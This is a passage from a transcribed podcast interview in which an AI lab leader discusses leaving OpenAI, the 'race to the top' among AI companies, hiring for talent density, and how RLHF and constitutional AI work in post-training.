01:28:46.540 | Yeah, yeah, yeah, exactly.
01:28:48.340 | And, and we need to get, we need to get away from this, this, this intense pro
01:28:54.940 | safety versus intense anti-regulatory rhetoric, right?
01:28:58.860 | It's turned into these, these flame wars on Twitter and nothing
01:29:02.500 | good's going to come of that.
01:29:03.300 | So there's a lot of curiosity about the different players in the game.
01:29:07.020 | One of the, uh, OGs is OpenAI.
01:29:09.220 | You've had several years of experience at OpenAI.
01:29:12.060 | What's your story and history there?
01:29:13.860 | Yeah.
01:29:14.340 | So I was at OpenAI for, uh, for roughly five years, uh, for the
01:29:18.900 | last, I think it was a couple of years.
01:29:20.700 | You know, I, I, I, I, I was a vice president of research there.
01:29:24.340 | Um, probably myself and Ilya Sutskever were the ones who, you know, really
01:29:27.940 | kind of set the, set the research direction around 2016 or 2017.
01:29:32.860 | I first started to really believe in, or at least confirm my belief in the
01:29:36.500 | scaling hypothesis when, when Ilya famously said to me, the thing you need
01:29:40.500 | to understand about these models is they just want to learn, the models just
01:29:44.220 | want to learn, um, and, and, and, and again, sometimes there are these one
01:29:47.500 | sentence, there are these one sentences, these Zen cones that you hear them.
01:29:50.740 | And you're like, ah, that, that explains everything that explains
01:29:54.740 | like a thousand things that I've seen.
01:29:56.260 | And then, and then I, I, you know, I, ever after I had this visualization
01:30:00.020 | in my head of like, you optimize the models in the right way.
01:30:02.820 | You point the models in the right way.
01:30:04.220 | They just want to learn.
01:30:05.460 | They just want to solve the problem regardless of what the problem is.
01:30:08.260 | So get out of their way, basically.
01:30:09.820 | Get out of their way.
01:30:10.900 | Yeah.
01:30:11.220 | Don't impose your own ideas about how they should learn.
01:30:14.420 | Or, and you know, this was the same thing as Rich Sutton put out in the
01:30:17.180 | bitter lesson or Gurin put out in the scaling hypothesis, you know, I think
01:30:21.260 | generally the dynamic was, you know, I got, I got this kind of inspiration
01:30:25.740 | from, uh, from, from, from, from Ilya and from others, folks like Alec Radford,
01:30:30.140 | who did the, the original, uh, uh, GPT one, uh, and then, uh, ran really hard
01:30:36.260 | with it, me, me and my collaborators on GPT two, GPT three, RL from human
01:30:41.420 | feedback, which was an attempt to kind of deal with the early safety and
01:30:44.500 | durability, things like debate and amplification, heavy on interpretability.
01:30:49.380 | So again, the combination of safety plus scaling, probably 2018, 2019, 2020.
01:30:55.820 | Those, those were, those were kind of the years when myself and my collaborators,
01:31:01.340 | probably, um, you know, many, many of whom became co-founders of Anthropic kind
01:31:07.180 | of really had, had, had a vision and like, and like drove the direction.
01:31:10.620 | Why'd you leave?
01:31:11.860 | Why'd you decide to leave?
01:31:13.220 | Yeah.
01:31:13.900 | So look, I'm going to put things this way and I, you know, I think it, I think
01:31:17.300 | it ties to the, to the, to the race, to the top, right, which is, you know, in
01:31:22.100 | my time at open AI, what I come to see as I'd come to appreciate the scaling
01:31:25.900 | hypothesis, and as I come to appreciate kind of the importance of safety along
01:31:30.340 | with the scaling hypothesis, the first one, I think, you know, open AI was, was
01:31:34.260 | getting, was getting on board with.
01:31:35.740 | Um, the second one in a way had always been part of, of open AI's messaging.
01:31:40.700 | Um, but, uh, you know, over, over many years of, of the time, the time that I
01:31:45.940 | spent there, I think I had a particular vision of how these, how we should
01:31:50.220 | handle these things, how we should be brought out in the world, the kind of
01:31:54.060 | principles that the organization should have.
01:31:57.260 | And look, I mean, there were like many, many discussions about like, you know,
01:32:01.740 | should the org do, should the company do this?
01:32:03.580 | Should the company do that?
01:32:04.740 | Like, there's a bunch of misinformation out there.
01:32:07.300 | People say like, we left because we didn't like the deal with Microsoft.
01:32:10.580 | False.
01:32:11.460 | Although, you know, it was like a lot of discussion, a lot of questions about
01:32:14.780 | exactly how we do the deal with Microsoft.
01:32:16.700 | Um, we left because we didn't like commercialization.
01:32:19.140 | That's not true.
01:32:20.180 | We built GPD three, which was the model that was commercialized.
01:32:23.060 | I was involved in commercialization.
01:32:25.260 | It's, it's more again about how do you do it?
01:32:28.220 | Like civilization is going down this path to very powerful AI.
01:32:32.820 | What's the way to do it?
01:32:34.460 | That is cautious, straightforward, honest, um, that builds trust in the
01:32:42.340 | organization and in individuals.
01:32:44.580 | How do we get from here to there?
01:32:46.980 | And how do we have a real vision for how to get it right?
01:32:49.460 | How can safety not just be something we say because it helps with recruiting?
01:32:54.900 | Um, and you know, I think, I think at the end of the day, um, if you have a vision
01:32:59.820 | for that, forget about anyone else's vision, I don't want to talk about anyone
01:33:02.820 | else's vision, if you have a vision for how to do it, you should go off
01:33:06.460 | and you should do that vision.
01:33:07.620 | It is incredibly unproductive to try and argue with someone else's vision.
01:33:12.340 | You might think they're not doing it the right way.
01:33:14.500 | You might think they're, they're, they're dishonest.
01:33:16.900 | Who knows?
01:33:17.340 | Maybe you're right.
01:33:17.940 | Maybe you're not.
01:33:18.500 | Um, uh, but, uh, what, what you should do is you should take some people you trust
01:33:23.420 | and you should go off together and you should make your vision happen.
01:33:26.260 | And if your vision is compelling, if you can make it appeal to people, some,
01:33:30.660 | you know, some combination of ethically, you know, in the market, uh, you know,
01:33:35.820 | if, if you can, if you can make a company, that's a place people want to join, uh,
01:33:40.900 | that, you know, engages in practices that people think are, are reasonable while
01:33:46.060 | managing to maintain its position in the ecosystem at the same time.
01:33:49.380 | If you do that, people will copy it.
01:33:51.860 | Um, and the fact that you are doing it, especially the fact that you're doing
01:33:55.460 | it better than they are, um, causes them to change their behavior in a much more
01:33:59.980 | compelling way than if they're your boss and you're arguing with them.
01:34:03.340 | I just, I don't know how to be any more specific about it than that, but I think
01:34:07.380 | it's generally very unproductive to try and get someone else's vision
01:34:11.460 | to look like your vision.
01:34:12.660 | Um, it's much more productive to go off and do a clean experiment
01:34:16.980 | and say, this is our vision.
01:34:18.620 | This is how, this is, this is how we're going to do things.
01:34:21.100 | Your choice is you can, you can ignore us, you can reject what we're doing, or you
01:34:27.140 | can, you can start to become more like us.
01:34:29.980 | And imitation is the sincerest form of flattery.
01:34:32.300 | Um, and you know, that, that, that plays out in the behavior of customers.
01:34:37.380 | That pays out in the behavior of the public that plays out in the behavior
01:34:40.700 | of where people choose to work.
01:34:41.940 | Uh, and again, again, at the end, it's, it's not about one company winning
01:34:47.100 | or another company winning if, if we are another company are engaging in
01:34:52.380 | some practice that, you know, people, people find genuinely appealing.
01:34:57.580 | And I want it to be in substance, not just, not just in appearance.
01:35:00.500 | Um, and you know, I think, I think researchers are sophisticated
01:35:03.940 | and they look at substance.
01:35:05.100 | Uh, and then other companies start copying that practice and they win
01:35:10.100 | because they copied that practice.
01:35:11.620 | That's great.
01:35:12.340 | That's success.
01:35:13.220 | That's like the race to the top.
01:35:15.100 | It doesn't matter who wins in the end, as long as everyone is copying
01:35:18.380 | everyone else's good practices.
01:35:19.780 | Right.
01:35:20.060 | One way I think of it is like the thing we're all afraid of
01:35:23.100 | is the race to the bottom.
01:35:23.980 | Right.
01:35:24.220 | And the race to the bottom doesn't matter who wins because we all lose.
01:35:27.540 | Right.
01:35:28.020 | Like, you know, in the most extreme world, we, we make this autonomous AI that,
01:35:31.900 | you know, the robots enslave us or whatever.
01:35:33.620 | Right.
01:35:33.860 | I mean, that's half joking, but you know, that, that is the most
01:35:37.460 | extreme, uh, thing, thing that could happen then, then it doesn't
01:35:40.820 | matter which company was ahead.
01:35:42.460 | Um, if instead you create a race to the top where people are competing
01:35:47.180 | to engage in good, in good practices, uh, then, you know, at the end of
01:35:51.900 | the day, you know, it doesn't matter who ends up, who ends up winning.
01:35:55.300 | It doesn't even matter who, who started the race to the top.
01:35:57.700 | The point isn't to be virtuous.
01:35:59.060 | The point is to get the system into a better equilibrium than it was before.
01:36:03.100 | And, and individual companies can play some role in doing this.
01:36:06.380 | Individual companies can, can, you know, can help to start it,
01:36:10.540 | can help to accelerate it.
01:36:12.020 | And frankly, I think individuals at other companies have,
01:36:14.740 | have done this as well.
01:36:15.660 | Right.
01:36:15.900 | The individuals that when we put out an RSP react by pushing harder to, to,
01:36:21.140 | to get something similar done, get something similar done at, at, at other
01:36:25.020 | companies, sometimes other companies do something that's like, we're like,
01:36:27.900 | oh, it's a good practice.
01:36:28.860 | We think, we think that's good.
01:36:30.340 | We should adopt it too.
01:36:31.420 | The only difference is, you know, I think, I think we are, um, we
01:36:35.580 | try to be more forward leaning.
01:36:37.140 | We try and adopt more of these practices first and
01:36:39.820 | adopt them more quickly when others, when others invent them.
01:36:42.460 | But I think this dynamic is what we should be pointing at.
01:36:45.780 | And that, I think, I think it abstracts away the question of, you know, which
01:36:50.860 | company's winning, who trusts, who, I think all these, all these questions
01:36:55.100 | of drama are, are profoundly uninteresting.
01:36:57.980 | And, and the, the thing that matters is the ecosystem that we all
01:37:01.540 | operate in and how to make that ecosystem better, because that
01:37:04.500 | constrains all the players.
01:37:05.940 | And so Anthropic is this kind of clean experiment built on a foundation of like
01:37:10.820 | what concretely AISAT should look like.
01:37:13.500 | We're, look, I'm sure we've made plenty of mistakes along the way.
01:37:16.420 | The perfect organization doesn't exist.
01:37:18.900 | It has to deal with the, the imperfection of a thousand employees.
01:37:23.100 | It has to deal with the imperfection of our leaders, including me.
01:37:25.900 | It has to deal with the imperfection of the people we've put, we've put to, you
01:37:30.260 | know, to oversee the imperfection of the, of the leaders, like the, like the board
01:37:33.900 | and the long-term benefit trust.
01:37:35.460 | It's, it's all, it's all a set of imperfect people trying to aim
01:37:39.460 | imperfectly at some ideal that will never perfectly be achieved.
01:37:42.380 | Um, that's what you sign up for.
01:37:44.300 | That's what it will always be.
01:37:45.660 | But, uh, uh, imperfect doesn't mean you just give up.
01:37:49.740 | There's better and there's worse.
01:37:51.340 | And hopefully, hopefully we can begin to build, we can do well
01:37:55.700 | enough that we can begin to build some practices that the whole industry engages
01:37:59.980 | in, and then, you know, my guess is that multiple of these companies will be
01:38:03.620 | successful and Tropic will be successful.
01:38:05.860 | These other companies, like once I've been at the past will also be
01:38:09.180 | successful and some will be more successful than others that's less
01:38:12.820 | important than again, that we, we align the incentives of the industry.
01:38:16.660 | And that happens partly through the race to the top, partly through things
01:38:19.980 | like RSP, partly through again, selected surgical regulation.
01:38:24.460 | You said talent density beats talent mass.
01:38:28.460 | So can you explain that?
01:38:30.820 | Can you expand on that?
01:38:31.660 | Can you just talk about what it takes to build a great team of
01:38:34.420 | AI researchers and engineers?
01:38:37.340 | This is one of these statements.
01:38:38.580 | That's like more true every, every, every month, every month.
01:38:41.660 | I see the statement is more true than I did the month before.
01:38:44.100 | So if I were to do a thought experiment, let's say you have a team of 100 people
01:38:50.300 | that are super smart, motivated, and aligned with the mission, and that's
01:38:53.700 | your company, or you can have a team of a thousand people where 200 people are
01:38:58.460 | super smart, super aligned with the mission, and then like 800 people are,
01:39:05.420 | let's just say you pick 800, like random, random big tech employees,
01:39:09.180 | which would you rather have, right?
01:39:10.980 | The talent mass is greater in the group of a thousand people, right?
01:39:16.340 | You have even a larger number of incredibly talented, incredibly
01:39:20.700 | aligned, incredibly smart people.
01:39:22.900 | But the issue is just that if every time someone super talented looks around,
01:39:30.940 | they see someone else super talented and super dedicated, that sets
01:39:34.700 | the tone for everything, right?
01:39:36.180 | That sets the tone for everyone is super inspired to work at the same place.
01:39:40.180 | Everyone trusts everyone else.
01:39:41.980 | If you have a thousand or 10,000 people and things have really regressed, right?
01:39:47.700 | You are not able to do selection and you're choosing random people.
01:39:51.220 | What happens is then you need to put a lot of processes and a
01:39:53.980 | lot of guardrails in place.
01:39:55.540 | Just because people don't fully trust each other, you have to
01:39:59.820 | adjudicate political battles.
01:40:01.500 | Like there are so many things that slow down the org's ability to operate.
01:40:06.060 | And so we're nearly a thousand people and, you know, we've, we've, we've
01:40:09.300 | tried to make it so that as large a fraction of those thousand people as
01:40:13.100 | possible are like super talented, super skilled.
01:40:16.980 | It's one of the reasons we've, we've slowed down hiring a
01:40:20.460 | lot in the last few months.
01:40:21.620 | We grew from 300 to 800, I believe, I think in the first
01:40:25.780 | seven, eight months of the year.
01:40:27.340 | And now we've slowed down.
01:40:28.820 | We're at like, you know, last three months we went from 800 to 900,
01:40:32.460 | 950, something like that.
01:40:33.940 | Don't quote me on the exact numbers, but I think there's an inflection
01:40:37.500 | point around a thousand and we want to be much more careful how, how we, how
01:40:41.420 | we grow, uh, early on and, and now as well, you know, we've hired a lot of
01:40:45.460 | physicists, um, you know, theoretical physicists can learn things really fast.
01:40:49.740 | Um, uh, even, even more recently as we've continued to hire that, you know,
01:40:54.460 | we've really had a high bar for, on both the research side and the software
01:40:58.780 | engineering side have hired a lot of senior people, including folks who used
01:41:02.660 | to be at other, at other companies in this space, and we, we've just
01:41:06.500 | continued to be very selective.
01:41:08.780 | It's very easy to go from a hundred to a thousand and a thousand to 10,000
01:41:13.620 | without paying attention to making sure everyone has a unified purpose.
01:41:18.060 | It's so powerful.
01:41:19.460 | If your company consists of a lot of different fiefdoms that all want to do
01:41:24.300 | their own thing, that are all optimizing for their own thing, um, uh, it's very
01:41:28.540 | hard to get anything done, but if everyone sees the broader purpose of the
01:41:32.100 | company, if there's trust and there's dedication to doing the right thing,
01:41:36.300 | that is a superpower that in itself, I think can overcome almost every other
01:41:40.740 | disadvantage and, you know, Steve jobs, a players, a players want to look around
01:41:45.140 | and see other players as another way of saying, I don't know what that is about
01:41:48.940 | human nature, but it is demotivating to see people who are not obsessively
01:41:54.140 | driving towards a singular mission.
01:41:55.660 | And it is on the flip side of that, super motivating to see that.
01:41:59.460 | It's interesting.
01:42:00.460 | Uh, what's it take to be a great AI researcher or engineer from everything
01:42:06.740 | you've seen from working with so many amazing people?
01:42:08.860 | Yeah.
01:42:09.260 | Um, I think the number one quality, especially on the research side, but
01:42:15.540 | really both is open-mindedness sounds easy to be open-minded, right?
01:42:19.820 | You're just like, Oh, I'm open to anything.
01:42:21.340 | Um, but you know, if I, if I think about my own early history in the scaling
01:42:26.420 | hypothesis, um, I was seeing the same data others were seeing.
01:42:31.020 | I don't think I was like a better programmer or better at coming up with
01:42:35.660 | research ideas than any of the hundreds of people that I worked with.
01:42:39.100 | Um, in some ways, in some ways I was worse.
01:42:41.060 | Um, uh, you know, like I've, I've never liked, you know, precise programming
01:42:45.980 | of like, you know, finding the bug, writing the GPU kernels, like I could
01:42:49.860 | point you to a hundred people here who are better, who are better at that than I am.
01:42:52.660 | Um, but, but the, the thing that, that, that I think I did have that was
01:42:57.900 | different was that I was just willing to look at something with new eyes, right?
01:43:03.380 | People said, Oh, you know, we don't have the right algorithms yet.
01:43:06.860 | We haven't come up with the right, the right way to do things.
01:43:10.260 | And I was just like, Oh, I don't know.
01:43:12.180 | Like, you know, this neural net has like 30 billion, 30 million parameters.
01:43:17.260 | Like, what if we gave it 50 million instead?
01:43:19.220 | Like let's plot some graphs like that, that basic scientific mindset of like,
01:43:23.980 | Oh man, like I, I just, I just like, I, you know, I see some variable that I could
01:43:29.180 | change, like what happens when it changes?
01:43:31.820 | Like, let's, let's try these different things and like create a graph for even
01:43:35.660 | the, this was like the simplest thing in the world, right?
01:43:37.700 | Change the number of, you know, this wasn't like PhD level experimental design.
01:43:42.380 | This was like, this was like simple and stupid.
01:43:45.140 | Like anyone could have done this if you, if you just told
01:43:47.900 | them that, that, that it was important.
01:43:49.620 | It's also not hard to understand.
01:43:51.300 | You didn't need to be brilliant to come up with this.
01:43:53.260 | Um, but you put the two things together and you know, some tiny number of people,
01:43:58.300 | some single digit number of people have, have driven forward the
01:44:01.420 | whole field by realizing this.
01:44:03.420 | Uh, and, and it's, you know, it's often like that.
01:44:05.860 | If you look back at the discovery, you know, the discoveries in history,
01:44:09.860 | they're, they're often like that.
01:44:11.340 | And so this, this open-mindedness and this willingness to see with new eyes
01:44:15.580 | that often comes from being newer to the field, often experience
01:44:19.140 | is a disadvantage for this.
01:44:20.700 | That is the most important thing.
01:44:22.340 | It's very hard to look for and test for, but I think, I think it's the most
01:44:25.620 | important thing because when you, when you find something, some really new way
01:44:29.780 | of thinking, thinking about things, when you have the initiative to do that,
01:44:32.860 | it's absolutely transformative.
01:44:34.180 | And also be able to do kind of rapid experimentation and in the face of that,
01:44:38.500 | be open-minded and curious, and looking at the data for just these fresh eyes
01:44:42.460 | and seeing what is that it's actually saying that applies in, uh,
01:44:45.620 | mechanistic interpretability.
01:44:46.900 | It's another example of this, like some of the early work in mechanistic
01:44:50.580 | interpretability, so simple.
01:44:52.740 | It's just, no one thought to care about this question before.
01:44:55.660 | You said what it takes to be a great AI researcher.
01:44:58.180 | Can we rewind the clock back?
01:45:00.340 | What advice would you give to people interested in AI?
01:45:02.820 | They're young, looking forward to, how can I make any impact on the world?
01:45:05.900 | I think my number one piece of advice is to just start playing with the models.
01:45:10.220 | Um, this was actually, I, I worry a little, this seems like obvious advice.
01:45:15.100 | Now, I think three years ago, it wasn't obvious and people started by, Oh, let
01:45:19.300 | me read the latest reinforcement learning paper.
01:45:21.380 | Let me, you know, let me, let me kind of, um, no, I mean, that was really the,
01:45:24.660 | that was really the, the, and I mean, you should do that as well, but, uh, now,
01:45:28.980 | you know, with wider availability of models and APIs, people are doing this
01:45:32.580 | more, but I think, I think just experiential knowledge, um, these models
01:45:39.060 | are new artifacts that no one really understands.
01:45:41.740 | Um, and so getting experience playing with them, I would also say again,
01:45:46.140 | in line with the, like, do something new, think in some new direction.
01:45:49.780 | Like there are all these things that haven't been explored.
01:45:53.220 | Like for example, mechanistic interpretability is still very new.
01:45:56.700 | It's probably better to work on that than it is to work on new model
01:45:59.540 | architectures, because it's, you know, it's more popular than it was before.
01:46:03.420 | There are probably like a hundred people working on it, but there aren't
01:46:05.580 | like 10,000 people working on it.
01:46:07.140 | And it's, it's this, this, this, this fertile area for study, like,
01:46:12.020 | like, you know, it's, there's, there's so much like low hanging fruit.
01:46:17.780 | You can just walk by and, you know, you can just walk
01:46:19.900 | by and you can pick things.
01:46:21.140 | Um, and, and the, the only reason for whatever reason people aren't, people
01:46:25.820 | aren't interested in it enough, I think there are some things around.
01:46:29.060 | Long, long horizon learning and long horizon tasks where
01:46:33.540 | there's a lot to be done.
01:46:34.660 | I think evaluations are still, we're still very early in our ability
01:46:38.340 | to study evaluations, particularly for dynamic systems, acting in the world.
01:46:42.300 | I think there's some stuff around multi-agent, um, skate where the
01:46:47.300 | puck is going is my, is my advice.
01:46:49.380 | And you don't have to be brilliant to think of it.
01:46:51.420 | Like all the things that are going to be exciting in five years,
01:46:54.900 | like in, in people even mentioned them as like, you know, conventional
01:46:58.540 | wisdom, but like, it's, it's just somehow there's this barrier that
01:47:02.140 | people don't, people don't double down as much as they could, or they're
01:47:05.860 | afraid to do something that's not the popular thing, I don't know why it
01:47:09.340 | happens, but like getting over that barrier is that's the, my number one
01:47:12.860 | piece of advice, let's talk, if it could a bit about post-training.
01:47:16.460 | Yeah.
01:47:16.900 | So it, uh, seems that the modern post-training recipe has, uh,
01:47:22.300 | a little bit of everything.
01:47:23.380 | So supervised, fine-tuning, RLHF, uh, the, the, the constitutional AI with RL-A-I-F.
01:47:32.140 | Best acronym.
01:47:32.860 | It's again, that naming thing.
01:47:34.620 | Uh, and then synthetic data seems like a lot of synthetic data, or at least
01:47:40.660 | trying to figure out ways to have high quality synthetic data.
01:47:43.180 | So what's the, uh, if this is a secret sauce that makes
01:47:46.860 | anthropic claw so, uh, incredible.
01:47:49.540 | What, how, how much of the magic is in the pre-training?
01:47:52.620 | How much is in the post-training?
01:47:53.980 | Yeah.
01:47:54.420 | Um, I mean, uh, so first of all, we're not perfectly able
01:47:56.940 | to measure that ourselves.
01:47:58.020 | Um, uh, you know, when you see some, some great character ability, sometimes
01:48:02.300 | it's hard to tell whether it came from pre-training or post-training.
01:48:05.100 | Uh, we've developed ways to try and distinguish between those
01:48:08.460 | two, but they're not perfect.
01:48:09.660 | You know, the second thing I would say is, you know, it's when there is an
01:48:12.980 | advantage and I think we've been pretty good at in general, in general at RL,
01:48:16.220 | perhaps, perhaps the best, although, although I don't know, cause I don't
01:48:19.340 | see what goes on inside other companies.
01:48:21.780 | Uh, usually it isn't, oh my God, we have this secret magic method
01:48:26.620 | that others don't have.
01:48:27.500 | Right.
01:48:27.820 | Usually it's like, well, you know, we got better at the infrastructure
01:48:31.860 | so we could run it for longer.
01:48:33.260 | Or, you know, we were able to get higher quality data, or we were able
01:48:36.460 | to filter our data better, or we were able to, you know, combine
01:48:39.540 | these methods and practice.
01:48:40.780 | It's, it's usually some boring matter of matter of kind of, uh, uh,
01:48:45.980 | practice and trade craft.
01:48:47.460 | Um, so, you know, when I think about how to do something special in terms
01:48:51.620 | of how we train these models, both pre-training, but even more so post
01:48:54.660 | training, um, you know, I, I really think of it a little more again, as
01:48:59.620 | like designing airplanes or cars.
01:49:01.860 | Like, you know, it's not just like, oh man, I have the blueprint.
01:49:04.940 | Like maybe that makes you make the next airplane, but like, there's some,
01:49:08.020 | there's some cultural trade craft of how we think about the design process
01:49:12.700 | that I think is more important than, than, you know, than, than any
01:49:15.620 | particular gizmo we're able to invent.
01:49:17.420 | Okay.
01:49:17.980 | Well, about, let me ask you about specific techniques.
01:49:20.380 | So first on RLHF, what do you think, just zooming out intuition, almost
01:49:25.300 | philosophy, why do you think RLHF works so well, if I go back to like
01:49:29.700 | the scaling hypothesis, one of the ways to skate the scaling hypothesis
01:49:33.820 | is if you train for X and you throw enough compute at it, um, then you
01:49:38.060 | get X and, and so RLHF is good at doing what humans want the model to
01:49:43.660 | do, or at least, um, to state it more precisely doing what humans who
01:49:48.060 | look at the model for a brief period of time and consider different
01:49:51.020 | possible responses, what they prefer as the response, uh, which is not
01:49:55.060 | perfect from both the safety and capabilities perspective in that
01:49:58.460 | humans are often not able to perfectly identify what the model wants and
01:50:02.420 | what humans want in the moment may not be what they want in the longterm.
01:50:05.140 | So there's, there's a lot of subtlety there, but the models are good at,
01:50:09.540 | uh, you know, producing what the humans in some shallow sense want.
01:50:13.900 | Uh, and it actually turns out that you don't even have to throw that
01:50:17.780 | much compute at it because of another thing, which is this, this thing
01:50:22.060 | about a strong pre-trained model being halfway to anywhere.
01:50:25.220 | Uh, uh, uh, so once you have the pre-trained model, you have all the
01:50:29.100 | representations you need to, to get the model, uh, to get the model
01:50:32.260 | where you, where you want it to go.
01:50:33.460 | So do you think our RLHF makes the model smarter or just
01:50:39.420 | appear smarter to the humans?
01:50:41.420 | I don't think it makes the model smarter.
01:50:43.780 | I don't think it just makes the model appear smarter.
01:50:46.700 | It's like RLHF like bridges, the gap between the human and the model, right.
01:50:52.140 | I could have something really smart that like can't communicate at all.
01:50:55.380 | Right.
01:50:55.580 | We all know people like this, um, people who are really smart, but the, you know,
01:50:59.340 | you can't understand what they're saying.
01:51:00.620 | Um, uh, so I think, I think RLHF just bridges that gap.
01:51:04.980 | Um, I think it's not, it's not the only kind of RL we do.
01:51:08.460 | It's not the only kind of RL that will happen in the future.
01:51:10.660 | I think RL has the potential to make models smarter, to make them reason
01:51:15.260 | better, to make them operate better, to make them develop new skills even.
01:51:20.100 | And perhaps that could be done, you know, even in some cases with human
01:51:24.020 | feedback, but the kind of RLHF we do today mostly doesn't do that yet.
01:51:28.260 | Although we're very quickly starting to be able to.
01:51:30.420 | But it appears to sort of increase.
01:51:32.380 | If you look at the metric of helpfulness, it increases that.
01:51:35.980 | It also increases, what was this, this word in Leopold's essay unhobbling,
01:51:41.180 | where basically the models are hobbled and then you do various
01:51:44.220 | trainings to them to unhobble them.
01:51:45.900 | So I, you know, I like that word cause it's like a rare word, but it's so,
01:51:49.460 | so I think RLHF unhobbles the models in some ways.
01:51:52.740 | Um, and then there are other ways where a model hasn't yet been unhobbled
01:51:55.780 | and, and, you know, needs to, needs to unhobble.
01:51:57.700 | If you can say in terms of costs, is pre-training the most expensive
01:52:02.220 | thing or is post-training creep up to that?
01:52:05.380 | At the present moment, it is still the case that, uh, pre-training
01:52:09.060 | is the majority of the cost.
01:52:10.380 | I don't know what to expect in the future, but I could certainly
01:52:13.220 | anticipate a future where post-training is the majority of the cost.
01:52:15.980 | In that future, you anticipate, would it be the humans or the AI?
01:52:19.980 | That's the costly thing for the post-training.
01:52:21.940 | I, I, I don't think you can scale up humans enough to get high quality.
01:52:27.100 | Any, any kind of method that relies on humans and uses a large amount
01:52:30.700 | of compute, it's going to have to rely on some scaled supervision
01:52:33.820 | method, like, uh, uh, like, um, you know, debate or iterated
01:52:37.740 | amplification or something like that.
01:52:39.460 | So on that super interesting, um, set of ideas around constitutional AI.
01:52:45.220 | Can you describe what it is as first detailed in December 2022 paper?
01:52:50.180 | And, uh, and beyond that, what is it?
01:52:53.580 | So this was from two years ago.
01:52:55.100 | The basic idea is, so we describe what RLHF is.
01:52:59.100 | You have, uh, you have a model and, uh, it, you know, spits out two po- you
01:53:04.820 | know, like you just sample from it twice, it spits out two possible responses.
01:53:08.060 | And you're like human, which response do you like better?
01:53:10.580 | Or another variant of it is rate this response on a scale of one to seven.
01:53:14.300 | So that's hard because you need to scale up human interaction.
01:53:17.460 | And, uh, it's very implicit, right?
01:53:19.660 | I don't have a sense of what I, what I want the model to do.
01:53:22.300 | I just have a sense of like what this average of a thousand
01:53:25.220 | humans wants the model to do.
01:53:26.900 | So two ideas, one is could the AI system itself decide which,
01:53:33.500 | uh, which response is better, right?
01:53:35.340 | Could you show the AI system, these two responses and ask
01:53:38.540 | which, which, which response is better.
01:53:40.180 | And then second, well, what criterion should the AI use?
01:53:43.500 | And so then there's this idea, cause you have a single document, a
01:53:46.940 | constitution, if you will, that says, these are the principles the
01:53:50.540 | model should be using to re to respond.
01:53:52.300 | And the AI system reads those.
01:53:54.780 | Um, it reads those principles as well as reading the
01:53:59.580 | environment and the response.
01:54:00.980 | And it says, well, how good did the AI model do?
01:54:04.140 | Um, it's basically a form of self-play.
01:54:06.100 | You're kind of training the model against itself.
01:54:08.740 | And so the AI gives the response and then you feed that back into
01:54:12.780 | what's called the preference model, which in turn feeds the
01:54:15.140 | model to make it better.
01:54:16.220 | Um, so you have this triangle of like the AI, the preference
01:54:20.180 | model, and the improvement of the AI itself.
01:54:22.540 | And we should say that in the constitution, the set of
01:54:24.660 | principles are like human interpretable.
01:54:26.900 | They're like, yeah, yeah.
01:54:27.900 | It's, it's something both the human and the AI system can read.
01:54:31.300 | So it has this nice, this nice kind of translatability or symmetry.
01:54:35.020 | Um, you know, in, in practice, we both use a model constitution and we use
01:54:39.700 | RLHF and we use some of these other methods, so it's, it's turned into
01:54:43.900 | one tool in a, in a toolkit that both reduces the need for RLHF and increases
01:54:50.220 | the value we get from, um, from, from using each data point of RLHF.
01:54:54.700 | Um, it also interacts in interesting ways with kind of future
01:54:57.700 | reasoning type RL methods.
01:54:59.740 | So, um, it's, it's one tool in the toolkit, but, but I think
01:55:03.780 | it is a very important tool.
01:55:04.940 | Well, it's a compelling one to us humans, you know, thinking about the founding
01:55:08.860 | fathers and the founding of the United States, the natural question is who and
01:55:14.300 | how do you think it gets to define the constitution, the, the set of
01:55:18.940 | principles in the constitution?
01:55:20.260 | Yeah.
01:55:20.660 | So I'll give like a practical, um, answer and a more abstract answer.
01:55:24.580 | I think the practical answer is like, look in practice, models get used by
01:55:28.340 | all kinds of different like customers.
01:55:30.300 | Right.
01:55:30.620 | And, and so, uh, you can have this idea where, you know, the model can, can
01:55:35.060 | have specialized rules or principles.
01:55:37.020 | You know, we fine tune versions of models implicitly.
01:55:40.220 | We've talked about doing it explicitly, having, having special principles that
01:55:43.860 | people can build into the models.
01:55:45.660 | Um, uh, so from a practical perspective, the answer can be very
01:55:49.780 | different from different people.
01:55:50.980 | Uh, you know, customer service agent, uh, you know, behaves very
01:55:54.020 | differently from a lawyer and obeys different principles.
01:55:56.740 | Um, but I think at the base of it, there are specific principles
01:56:00.500 | that the models, uh, you know, have to obey.
01:56:03.300 | I think a lot of them are things that people would agree with.
01:56:06.100 | Everyone agrees that, you know, we don't, you know, we don't want
01:56:09.100 | models to present these CBRN risks.
01:56:11.460 | Um, I think we can go a little further and agree with some basic principles
01:56:15.540 | of democracy and the rule of law.
01:56:17.340 | Beyond that, it gets, you know, very uncertain and, and there, our goal is
01:56:21.100 | generally for the models to be more neutral, to not espouse a particular
01:56:26.100 | point of view and, you know, more just be kind of like wise, uh, agents
01:56:31.220 | or advisors that will help you think things through and will, you know,
01:56:34.660 | present, present possible considerations, but, you know, don't express, you
01:56:38.740 | know, strong or specific opinions.
01:56:40.540 | OpenAI released a model spec where it kind of clearly concretely defines some
01:56:46.780 | of the goals of the model and specific examples like A, B, how the model should
01:56:52.580 | behave, do you find that interesting?
01:56:54.500 | By the way, I should mention the, I believe the brilliant John
01:56:58.060 | Shulman was a part of that.
01:56:59.340 | He's now at Anthropic.
01:57:00.380 | Uh, do you think this is a useful direction?
01:57:03.380 | Might Anthropic release a model spec as well?
01:57:05.220 | Yeah.
01:57:05.860 | So I think that's a pretty useful direction.
01:57:08.020 | Again, it has a lot in common with, uh, constitutional AI.
01:57:11.500 | So again, another example of like a race to the top, right?
01:57:14.660 | We have something that's like, we think, you know, a better and more
01:57:18.260 | responsible way of doing things.
01:57:20.220 | Um, it's also a competitive advantage.
01:57:22.060 | Um, then, uh, others kind of, you know, discover that it has advantages
01:57:26.660 | and then start to do that thing.
01:57:28.180 | Uh, we then no longer have the competitive advantage, but it's good
01:57:31.700 | from the perspective that now everyone has adopted a positive practice
01:57:36.140 | that others were not adopting.
01:57:37.580 | And so our response to that as well, looks like we need a new competitive
01:57:40.860 | advantage in order to keep driving this race upwards.
01:57:43.140 | Um, so that's, that's how I generally feel about that.
01:57:45.660 | I also think every implementation of these things is different.
01:57:48.820 | So, you know, there were some things in the model spec that
01:57:51.540 | were not in constitutional AI.
01:57:53.300 | And so, you know, we, you know, we can always, we can always adopt those
01:57:56.460 | things or, you know, at least learn from them.
01:57:58.260 | Um, so again, I think this is an example of like the positive dynamic
